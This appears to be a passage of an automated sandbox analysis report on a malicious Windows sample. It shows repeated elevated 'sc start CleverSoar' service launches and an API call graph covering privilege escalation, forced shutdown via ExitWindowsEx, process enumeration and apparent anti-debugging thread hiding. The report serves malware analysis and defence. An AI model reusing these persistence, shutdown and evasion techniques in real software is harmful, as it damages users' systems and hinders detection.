                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.3%
                              Total number of Nodes:790
                              Total number of Limit Nodes:13
calls std::_Xinvalid_argument 100871->100876 100875->100868 100876->100870 100877->100868 100878->100868 100879->100868 100880 6caef8a3 100882 6caef887 100880->100882 100881 6caf02ac GetCurrentProcess TerminateProcess 100883 6caf02ca 100881->100883 100882->100881 100884 6cad4b53 100885 6cc56a43 std::_Facet_Register 4 API calls 100884->100885 100886 6cad4b5c _Yarn 100885->100886 100887 6cc4aec0 FindFirstFileA 100886->100887 100892 6cad4bae std::ios_base::_Ios_base_dtor 100887->100892 100888 6caf639e 101065 6cc60130 18 API calls 2 library calls 100888->101065 100890 6cad4cff 100891 6cad5164 CreateFileA CloseHandle 100896 6cad51ec 100891->100896 100892->100888 100892->100890 100892->100891 100893 6cae245a _Yarn _strlen 100892->100893 100893->100888 100894 6cc4aec0 FindFirstFileA 100893->100894 100910 6cae2a83 std::ios_base::_Ios_base_dtor 100894->100910 101042 6cc55120 OpenSCManagerA 100896->101042 100898 6cadfc00 101058 6cc55240 CreateToolhelp32Snapshot 100898->101058 100901 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100936 6cad5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100901->100936 100903 6cae37d0 Sleep 100948 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100903->100948 100904 6cc4aec0 FindFirstFileA 100904->100936 100905 6caf63b2 101066 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 100905->101066 100906 6cc55240 4 API calls 100924 6cae053a 100906->100924 100908 6cc55240 4 API calls 100929 6cae12e2 100908->100929 100909 6caf64f8 100910->100888 101046 6cc40390 100910->101046 100911 6cadffe3 100911->100906 100915 6cae0abc 100911->100915 100912 6caf6ba0 104 API calls 100912->100936 100913 6caf6e60 32 API calls 100913->100936 100915->100893 100915->100908 100916 6caf7090 77 API calls 100916->100936 100917 6cc55240 4 API calls 100917->100915 100918 6cad6722 101055 6cc51880 25 API calls 4 library calls 100918->101055 100919 6cc55240 4 API calls 100937 6cae1dd9 100919->100937 100920 
6cae211c 100920->100893 100923 6cae241a 100920->100923 100921 6cc4aec0 FindFirstFileA 100921->100948 100922 6cb1e010 67 API calls 100922->100936 100925 6cc40390 11 API calls 100923->100925 100924->100915 100924->100917 100926 6cae244d 100925->100926 101064 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100926->101064 100928 6cae2452 Sleep 100928->100893 100929->100919 100929->100920 100941 6cae16ac 100929->100941 100930 6cad6162 100931 6cad740b 100932 6cc54ff0 4 API calls 100931->100932 100940 6cad775a _strlen 100932->100940 100933 6cc55240 4 API calls 100933->100920 100934 6caf6ba0 104 API calls 100934->100948 100935 6caf6e60 32 API calls 100935->100948 100936->100888 100936->100898 100936->100901 100936->100904 100936->100912 100936->100913 100936->100916 100936->100918 100936->100922 100936->100930 100937->100920 100937->100933 100938 6caf7090 77 API calls 100938->100948 100939 6cb1e010 67 API calls 100939->100948 100940->100888 100942 6cad7ba9 100940->100942 100943 6cad7b92 100940->100943 100946 6cad7b43 _Yarn 100940->100946 100945 6cc56a43 std::_Facet_Register 4 API calls 100942->100945 100944 6cc56a43 std::_Facet_Register 4 API calls 100943->100944 100944->100946 100945->100946 100947 6cc4aec0 FindFirstFileA 100946->100947 100957 6cad7be7 std::ios_base::_Ios_base_dtor 100947->100957 100948->100888 100948->100921 100948->100934 100948->100935 100948->100938 100948->100939 100949 6cc54ff0 4 API calls 100960 6cad8a07 100949->100960 100950 6cad9d7f 100954 6cc56a43 std::_Facet_Register 4 API calls 100950->100954 100951 6cad9d68 100953 6cc56a43 std::_Facet_Register 4 API calls 100951->100953 100952 6cad962c _strlen 100952->100888 100952->100950 100952->100951 100955 6cad9d18 _Yarn 100952->100955 100953->100955 100954->100955 100956 6cc4aec0 FindFirstFileA 100955->100956 100965 6cad9dbd std::ios_base::_Ios_base_dtor 100956->100965 100957->100888 100957->100949 100957->100952 100958 6cad8387 
100957->100958 100959 6cc54ff0 4 API calls 100968 6cad9120 100959->100968 100960->100959 100961 6cc54ff0 4 API calls 100978 6cada215 _strlen 100961->100978 100962 6cc54ff0 4 API calls 100964 6cad9624 100962->100964 100963 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100969 6cade8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100963->100969 101056 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100964->101056 100965->100888 100965->100961 100965->100969 100967 6cc4aec0 FindFirstFileA 100967->100969 100968->100962 100969->100888 100969->100963 100969->100967 100970 6cadf7b1 100969->100970 100971 6caded02 Sleep 100969->100971 101057 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100970->101057 100990 6cade8c1 100971->100990 100973 6cade8dd GetCurrentProcess TerminateProcess 100973->100969 100974 6cada9bb 100976 6cc56a43 std::_Facet_Register 4 API calls 100974->100976 100975 6cada9a4 100977 6cc56a43 std::_Facet_Register 4 API calls 100975->100977 100985 6cada953 _Yarn _strlen 100976->100985 100977->100985 100978->100888 100978->100974 100978->100975 100978->100985 100979 6cc54ff0 4 API calls 100979->100990 100980 6cadfbb8 100981 6cadfbe8 ExitWindowsEx Sleep 100980->100981 100981->100898 100982 6cadf7c0 100982->100980 100983 6cadb009 100987 6cc56a43 std::_Facet_Register 4 API calls 100983->100987 100984 6cadaff0 100986 6cc56a43 std::_Facet_Register 4 API calls 100984->100986 100985->100905 100985->100983 100985->100984 100988 6cadafa0 _Yarn 100985->100988 100986->100988 100987->100988 100989 6cc55960 104 API calls 100988->100989 100991 6cadb059 std::ios_base::_Ios_base_dtor _strlen 100989->100991 100990->100969 100990->100973 100990->100979 100991->100888 100992 6cadb42c 100991->100992 100993 6cadb443 100991->100993 100996 6cadb3da _Yarn _strlen 100991->100996 100994 6cc56a43 
std::_Facet_Register 4 API calls 100992->100994 100995 6cc56a43 std::_Facet_Register 4 API calls 100993->100995 100994->100996 100995->100996 100996->100905 100997 6cadb79e 100996->100997 100998 6cadb7b7 100996->100998 101001 6cadb751 _Yarn 100996->101001 100999 6cc56a43 std::_Facet_Register 4 API calls 100997->100999 101000 6cc56a43 std::_Facet_Register 4 API calls 100998->101000 100999->101001 101000->101001 101002 6cc55960 104 API calls 101001->101002 101003 6cadb804 std::ios_base::_Ios_base_dtor _strlen 101002->101003 101003->100888 101004 6cadbc0f 101003->101004 101005 6cadbc26 101003->101005 101008 6cadbbbd _Yarn _strlen 101003->101008 101006 6cc56a43 std::_Facet_Register 4 API calls 101004->101006 101007 6cc56a43 std::_Facet_Register 4 API calls 101005->101007 101006->101008 101007->101008 101008->100905 101009 6cadc08e 101008->101009 101010 6cadc075 101008->101010 101013 6cadc028 _Yarn 101008->101013 101012 6cc56a43 std::_Facet_Register 4 API calls 101009->101012 101011 6cc56a43 std::_Facet_Register 4 API calls 101010->101011 101011->101013 101012->101013 101014 6cc55960 104 API calls 101013->101014 101019 6cadc0db std::ios_base::_Ios_base_dtor _strlen 101014->101019 101015 6cadc7bc 101018 6cc56a43 std::_Facet_Register 4 API calls 101015->101018 101016 6cadc7a5 101017 6cc56a43 std::_Facet_Register 4 API calls 101016->101017 101026 6cadc753 _Yarn _strlen 101017->101026 101018->101026 101019->100888 101019->101015 101019->101016 101019->101026 101020 6cadd3ed 101022 6cc56a43 std::_Facet_Register 4 API calls 101020->101022 101021 6cadd406 101023 6cc56a43 std::_Facet_Register 4 API calls 101021->101023 101024 6cadd39a _Yarn 101022->101024 101023->101024 101025 6cc55960 104 API calls 101024->101025 101027 6cadd458 std::ios_base::_Ios_base_dtor _strlen 101025->101027 101026->100905 101026->101020 101026->101021 101026->101024 101032 6cadcb2f 101026->101032 101027->100888 101028 6cadd8bb 101027->101028 101029 6cadd8a4 101027->101029 101033 6cadd852 _Yarn _strlen 
101027->101033 101031 6cc56a43 std::_Facet_Register 4 API calls 101028->101031 101030 6cc56a43 std::_Facet_Register 4 API calls 101029->101030 101030->101033 101031->101033 101033->100905 101034 6caddccf 101033->101034 101035 6caddcb6 101033->101035 101038 6caddc69 _Yarn 101033->101038 101037 6cc56a43 std::_Facet_Register 4 API calls 101034->101037 101036 6cc56a43 std::_Facet_Register 4 API calls 101035->101036 101036->101038 101037->101038 101039 6cc55960 104 API calls 101038->101039 101041 6caddd1c std::ios_base::_Ios_base_dtor 101039->101041 101040 6cc54ff0 4 API calls 101040->100969 101041->100888 101041->101040 101045 6cc55156 101042->101045 101043 6cc551e8 OpenServiceA 101043->101045 101044 6cc5522f 101044->100936 101045->101043 101045->101044 101052 6cc403a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101046->101052 101047 6cc43f5f CloseHandle 101047->101052 101048 6cc4310e CloseHandle 101048->101052 101049 6cae37cb 101054 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101049->101054 101050 6cc2c1e0 WriteFile WriteFile WriteFile ReadFile 101050->101052 101051 6cc4251b CloseHandle 101051->101052 101052->101047 101052->101048 101052->101049 101052->101050 101052->101051 101067 6cc2b730 101052->101067 101054->100903 101055->100931 101056->100952 101057->100982 101060 6cc552a0 std::locale::_Setgloballocale 101058->101060 101059 6cc55277 CloseHandle 101059->101060 101060->101059 101061 6cc55320 Process32NextW 101060->101061 101062 6cc553b1 101060->101062 101063 6cc55345 Process32FirstW 101060->101063 101061->101060 101062->100911 101063->101060 101064->100928 101066->100909 101068 6cc2b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101067->101068 101069 6cc2c180 101068->101069 101070 6cc2bced CreateFileA 101068->101070 101072 6cc2aa30 101068->101072 101069->101052 101070->101068 101075 6cc2aa43 __wsopen_s std::locale::_Setgloballocale 101072->101075 101073 6cc2b3e9 WriteFile 
101073->101075 101074 6cc2b43d WriteFile 101074->101075 101075->101073 101075->101074 101076 6cc2b718 101075->101076 101077 6cc2ab95 ReadFile 101075->101077 101076->101068 101077->101075 101078 6cad3d62 101080 6cad3bc0 101078->101080 101079 6cad3e8a GetCurrentThread NtSetInformationThread 101081 6cad3eea 101079->101081 101080->101079
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                              • Instruction ID: 89e52c12fa2f17db4263026c0277d83fcd2190644a96e119fe476d8b95d417ce
                              • Opcode Fuzzy Hash: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                              • Instruction Fuzzy Hash: 69741771645B028FC728CF28C8D0695B7F3EF8531871E8A6DC0968BB55EB74B58ACB50
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                              • Instruction ID: 1486761de2dfdd98553987b207497d603c99493515637e483efb089ce3636106
                              • Opcode Fuzzy Hash: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                              • Instruction Fuzzy Hash: 0434F6716457018FC728CF28C8D0A95B7F3EF89318B1D8A6DC0968BB55E774B58ADB80

                              Control-flow Graph

                              control_flow_graph 7677 6cc55240-6cc55275 CreateToolhelp32Snapshot 7678 6cc552a0-6cc552a9 7677->7678 7679 6cc552e0-6cc552e5 7678->7679 7680 6cc552ab-6cc552b0 7678->7680 7683 6cc55377-6cc553a1 call 6cc62c05 7679->7683 7684 6cc552eb-6cc552f0 7679->7684 7681 6cc55315-6cc5531a 7680->7681 7682 6cc552b2-6cc552b7 7680->7682 7689 6cc553a6-6cc553ab 7681->7689 7690 6cc55320-6cc55332 Process32NextW 7681->7690 7685 6cc55334-6cc5535d call 6cc5b920 Process32FirstW 7682->7685 7686 6cc552b9-6cc552be 7682->7686 7683->7678 7687 6cc55277-6cc55292 CloseHandle 7684->7687 7688 6cc552f2-6cc552f7 7684->7688 7695 6cc55362-6cc55372 7685->7695 7686->7678 7693 6cc552c0-6cc552d1 7686->7693 7687->7678 7688->7678 7694 6cc552f9-6cc55313 7688->7694 7689->7678 7692 6cc553b1-6cc553bf 7689->7692 7690->7695 7693->7678 7694->7678 7695->7678
